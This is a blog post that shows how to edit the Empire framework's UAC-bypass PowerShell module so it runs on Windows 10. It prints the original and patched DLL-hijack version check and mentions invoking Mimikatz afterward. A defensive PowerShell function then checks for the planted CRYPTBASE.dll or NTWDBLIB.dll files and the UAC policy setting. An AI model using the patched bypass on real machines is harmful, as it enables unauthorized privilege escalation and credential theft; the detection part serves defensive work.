Using Empire in Kali 2.0 to bypass UAC and invoke Mimikatz on Win10
So I was testing out Empire the other day against a Windows 10 box, but the bypassuac module kept throwing an error. The relevant check in the module looks like this:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})
if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
    # windows 7/2008
    $szElevDll = 'CRYPTBASE.dll'
    $szElevDir = $env:WINDIR + "\System32\sysprep"
    $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
    $szElevExeFull = "$szElevDir\sysprep.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3")) {
    # windows 8/2012
    $szElevDll = 'NTWDBLIB.dll'
    $szElevDir = $env:WINDIR + "\System32"
    $szElevDirSysWow64 = ''
    $szElevExeFull = "$szElevDir\cliconfg.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 8/2012 detected"
}
else {
    "[!] Unsupported OS!"
    throw("Unsupported OS!")
}

There it is, that dreaded "Unsupported OS!" error. The module checks the OS version, but the list of accepted versions never includes Windows 10 (major.minor "10.0"). So let's change that:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})
if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
    # windows 7/2008
    $szElevDll = 'CRYPTBASE.dll'
    $szElevDir = $env:WINDIR + "\System32\sysprep"
    $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
    $szElevExeFull = "$szElevDir\sysprep.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") -or ($OSVersion -eq "10.0")) {
    # windows 8/2012/10
    $szElevDll = 'NTWDBLIB.dll'
    $szElevDir = $env:WINDIR + "\System32"
    $szElevDirSysWow64 = ''
    $szElevExeFull = "$szElevDir\cliconfg.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 8/2012/10 detected"
}
else {
    "[!] Unsupported OS!"
    throw("Unsupported OS!")
}

In the original code, line 555 only accepted Windows 8 or Server 2012 (versions "6.2" and "6.3"). In the modified version I added "10.0" to that condition so Windows 10 takes the same cliconfg.exe/NTWDBLIB.dll branch.
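From the defender's side, the two branches above tell you exactly what to look for: a DLL dropped at System32\sysprep\CRYPTBASE.dll or System32\NTWDBLIB.dll, neither of which exists on a clean install. The following is an added example, not code from the post or from Empire; it checks those two paths, compares the version string PowerShell sees against the one CIM reports (an unmanifested host can report "6.2" on Windows 10, which is why checks on this string are fragile), and reads the UAC policy values, since "Always notify" (ConsentPromptBehaviorAdmin = 2) disables the auto-elevation these hijacks depend on.

```powershell
function Get-UacBypassIndicators {
    $sys32 = Join-Path $env:WINDIR 'System32'
    # Hijack locations used by the two branches of the version check above.
    $targets = @(
        (Join-Path $sys32 'sysprep\CRYPTBASE.dll'),   # Windows 7/2008 branch (sysprep.exe)
        (Join-Path $sys32 'NTWDBLIB.dll')             # Windows 8/2012/10 branch (cliconfg.exe)
    )
    $findings = foreach ($t in $targets) {
        if (Test-Path -LiteralPath $t) {
            $item = Get-Item -LiteralPath $t
            $sig  = Get-AuthenticodeSignature -FilePath $t
            [pscustomobject]@{
                Path      = $t
                Written   = $item.LastWriteTime
                Signature = $sig.Status        # a planted DLL is typically NotSigned
            }
        }
    }

    # Version as seen by this process versus the value CIM reports for the OS.
    $envVer = [Environment]::OSVersion.Version
    $cimVer = (Get-CimInstance -ClassName Win32_OperatingSystem).Version

    # UAC policy: 2 = "Always notify" (blocks auto-elevation); 5 is the Windows default.
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

    [pscustomobject]@{
        PlantedDlls                = @($findings)
        EnvironmentVersion         = "$($envVer.Major).$($envVer.Minor)"
        CimVersion                 = $cimVer
        EnableLUA                  = $pol.EnableLUA
        ConsentPromptBehaviorAdmin = $pol.ConsentPromptBehaviorAdmin
        AutoElevateBlocked         = ($pol.ConsentPromptBehaviorAdmin -eq 2)
    }
}

Get-UacBypassIndicators | Format-List
```

Any entry in PlantedDlls, or a mismatch between EnvironmentVersion and CimVersion, is worth a closer look; AutoElevateBlocked tells you whether the host's UAC level already neutralises this class of bypass.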
Here’s a video of me doing this start to finish. As always, if you have any questions feel free to drop by #infoseclabs on freenode.
Video:
https://www.youtube.com/watch?v=Q5NOKJhU7TA&feature=youtu.be
